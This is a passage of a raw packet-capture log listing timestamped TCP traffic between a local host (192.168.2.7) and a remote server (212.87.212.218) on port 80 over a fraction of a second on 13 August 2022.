                                                                                                          Aug 13, 2022 09:07:44.159806967 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.159831047 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.159849882 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.159866095 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.159888983 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.159894943 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.159909964 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.159938097 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.159956932 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.168498039 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168533087 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168550014 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168569088 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168585062 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168601036 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168623924 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168646097 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168644905 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.168663025 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168682098 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168682098 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.168699980 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168716908 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168721914 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.168739080 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168749094 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.168760061 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168770075 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.168776989 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168792963 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.168812990 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.168859005 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.169100046 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169118881 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169136047 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169152975 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169162989 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.169168949 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169208050 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.169384956 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169406891 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169430017 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169447899 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169461012 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.169464111 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169482946 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169492006 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.169502020 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169523954 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169543028 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.169585943 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.169728041 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169751883 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169773102 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169790983 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.169833899 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.170157909 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.170217991 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.170239925 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.170258045 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.170274019 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.170301914 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.170319080 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.170336962 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.170355082 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.170368910 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.170380116 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.170388937 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.170547009 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.170564890 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.170582056 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.170592070 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.170599937 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.170618057 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.170635939 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.170670986 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.170721054 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.178664923 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.178692102 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.178710938 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.178726912 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.178765059 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.178853035 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.179215908 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179265976 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179286003 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179306030 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179322958 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179332972 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.179358959 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179371119 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.179384947 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179406881 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179408073 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.179426908 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179446936 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179455042 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.179467916 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179486036 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179490089 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.179502964 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179511070 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.179537058 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179548025 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.179554939 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179573059 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179579973 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.179589033 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179605961 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179610014 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.179629087 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.179647923 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.179671049 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.183916092 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.198585987 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198616982 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198642015 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198646069 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.198649883 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198673964 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198683023 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.198683977 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198700905 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198708057 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.198721886 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198745012 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198780060 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.198785067 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.198788881 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198806047 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198815107 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.198828936 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198858023 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198867083 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198870897 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.198889971 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198894024 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.198910952 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198945999 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198947906 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.198970079 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.198990107 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.198993921 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.199044943 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.199064970 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.199084044 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.199084997 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.199106932 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.199116945 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.199127913 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.199148893 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.414030075 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.423440933 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.423542976 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.431494951 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431538105 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431560040 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431582928 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431607008 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431629896 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431654930 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431674004 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431694984 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431719065 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431740999 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431766033 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431787014 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431808949 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431830883 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431850910 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431871891 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431894064 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431915045 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431935072 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431956053 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431978941 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.431999922 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.432022095 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.432044029 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.434205055 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.451627016 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451664925 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451690912 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451698065 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.451718092 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451742887 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451742887 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.451767921 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451788902 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.451791048 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451812983 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451836109 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451857090 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451879025 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451880932 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.451884985 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.451900959 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451922894 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451946974 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451970100 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.451972961 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.451976061 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.451992035 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452013016 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452014923 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452033043 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452056885 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452075005 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452075958 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452097893 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452121973 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452141047 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452146053 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452147007 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452168941 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452189922 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452210903 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452233076 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452255011 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452258110 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452259064 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452282906 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452305079 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452327967 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452332020 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452334881 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452351093 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452374935 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452398062 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452405930 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452423096 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452445984 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452469110 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452490091 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452492952 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452493906 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452517033 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452541113 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452564955 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452565908 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452567101 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452589989 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452614069 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452636003 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452661037 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452675104 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452677965 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452685118 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452708960 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452732086 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452753067 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452754021 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.452755928 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.452778101 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.453655958 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.457737923 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470204115 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470247984 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470274925 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470298052 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470319986 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470344067 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470371962 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470396042 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470402002 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470418930 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470419884 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470423937 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470443010 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470467091 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470468044 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470490932 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470514059 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470536947 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470558882 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470576048 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470578909 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470583916 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470608950 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470630884 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470659018 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470659971 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470664024 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470683098 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470705032 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470729113 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470729113 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470752001 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470776081 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470799923 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470801115 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470803976 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470824957 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470849037 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470880985 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470890999 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470906973 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470911026 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470915079 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470938921 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470961094 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470985889 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.470994949 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.470998049 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.471009016 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.471035004 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.471060038 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.471074104 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.471079111 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.471084118 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.471106052 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.471129894 CEST8049773212.87.212.218192.168.2.7
